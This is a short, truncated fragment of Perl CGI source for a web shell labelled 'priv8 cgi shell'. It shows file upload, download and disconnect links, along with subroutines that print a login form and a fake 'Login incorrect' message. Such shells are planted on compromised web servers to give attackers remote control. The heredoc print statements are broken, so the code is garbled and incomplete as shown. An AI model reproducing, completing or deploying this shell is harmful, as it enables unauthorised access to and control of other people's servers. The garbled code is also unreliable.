# | priv8 cgi shell Connected to $ServerName |
Upload File | Download File | Disconnect | |
$; #' print <
$Message
END
}
#------------------------------------------------------------------------------
# Prints the message that informs the user of a failed login
#------------------------------------------------------------------------------
sub PrintLoginFailedMessage
{
print <
login: admin
password:
Login incorrect
END
}
#------------------------------------------------------------------------------
# Prints the HTML form for logging in
#------------------------------------------------------------------------------
sub PrintLoginForm
{
print <